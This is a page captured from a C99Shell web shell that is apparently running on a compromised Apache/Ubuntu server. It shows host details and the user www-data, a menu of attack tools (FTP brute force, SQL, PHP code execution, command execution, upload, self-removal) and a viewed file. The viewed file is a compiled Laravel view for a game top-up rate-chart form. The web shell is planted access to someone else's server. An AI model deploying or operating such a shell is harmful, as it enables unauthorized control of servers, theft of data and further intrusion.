!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/cloud_campaign/storage/framework/views/   drwxrwxrwx
Free 13.2 GB of 57.97 GB (22.76%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     1e0285dfebee6e2c2450572c3a6cfe704c70088b.php (5.93 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php $__env->startSection('content'); ?>
    <?php echo $__env->make('users.partials.header', [
    ], 
\Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?>   

    <div class="container-fluid mt--7">
        <div class="row">
            <div class="col-xl-12 order-xl-1">
                <div class="card bg-secondary shadow">
                    <div class="card-header bg-white border-0">
                        <div class="row align-items-center">
                            <h3 class="mb-0"><?php echo e(__('Add Rate Chart')); ?></h3>
                        </div>
                    </div>
                    <div class="card-body">
                        <form method="post" action="<?php echo e(route('user.add')); ?>" autocomplete="off">
                            <?php echo csrf_field(); ?>
                            <?php echo method_field('post'); ?>

                            
                            <?php if(session('status')): ?>
                                <div class="alert alert-success alert-dismissible fade show" role="alert">
                                    <?php echo e(session('status')); ?>

                                    <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                                        <span aria-hidden="true">&times;</span>
                                    </button>
                                </div>
                            <?php endif; ?>


                            <div class="pl-lg-4">
                                <div class="form-row">
                                     <div class="form-group<?php echo e($errors->has('name') ? ' has-danger' ''); ?> col-md-6 ">
                                        <label class="form-control-label" for="input-name"><?php echo e(__('Game Name')); ?></label>

                                            <select class="form-control"   name="name" id="name">
                                                <option selected>Select Game</option>
                                                <option value="Pubg">Pubg</option>
                                                <option value="Free Fire">Free Fire</option>
                                                <option value="COC">COC</option>
                                                <option value="COD Mobile">COD Mobile</option>
                                                <option value="Valorant">Valorant</option>
                                                <option value="WarZone">WarZone</option>
                                            </select>
                                         
                                             <!-- </div> -->
                                            
                                        <!-- </div>  -->
                                        <?php if($errors->has('name')): ?>
                                            <span class="invalid-feedback" role="alert">
                                                <strong><?php echo e($errors->first('name')); ?></strong>
                                            </span>
                                        <?php endif; ?>
                                    </div>
                                    <div class="form-group<?php echo e($errors->has('amount') ? ' has-danger' ''); ?> col-md-6">
                                        <label class="form-control-label" for="input-amount"><?php echo e(__('Amount')); ?></label>
                                        <input type="text" name="amount" id="input-amount" class="form-control form-control-alternative<?php echo e($errors->has('amount') ? ' is-invalid' ''); ?>" placeholder="<?php echo e(__('Amount')); ?>"  required autofocus>

                                        <?php if($errors->has('amount')): ?>
                                            <span class="invalid-feedback" role="alert">
                                                <strong><?php echo e($errors->first('amount')); ?></strong>
                                            </span>
                                        <?php endif; ?>
                                    </div>
                                    <div class="form-group<?php echo e($errors->has('Taka') ? ' has-danger' ''); ?> col-md-6" >
                                        <label class="form-control-label" for="input-taka"><?php echo e(__('Taka')); ?></label>
                                        <input type="text" name="taka" id="input-taka" class="form-control form-control-alternative<?php echo e($errors->has('taka') ? ' is-invalid' ''); ?>" placeholder="<?php echo e(__('Taka')); ?>"  required>

                                        <?php if($errors->has('taka')): ?>
                                            <span class="invalid-feedback" role="alert">
                                                <strong><?php echo e($errors->first('taka')); ?></strong>
                                            </span>
                                        <?php endif; ?>
                                    </div>
                                    <div style="margin-left:120px;margin-top:5px; ">
                                        <button type="submit" class="btn btn-success mt-4" style="font-size: 18px;"><?php echo e(__('Save')); ?></button>
                                    </div>
                                </div>

                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
        
        <?php echo $__env->make('layouts.footers.auth'\Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?>
    </div>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.app', ['title' => __('Add User')], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?><?php /**PATH C:\xampp\htdocs\reseller\resources\views/rateChart/addRateChart.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0055 ]--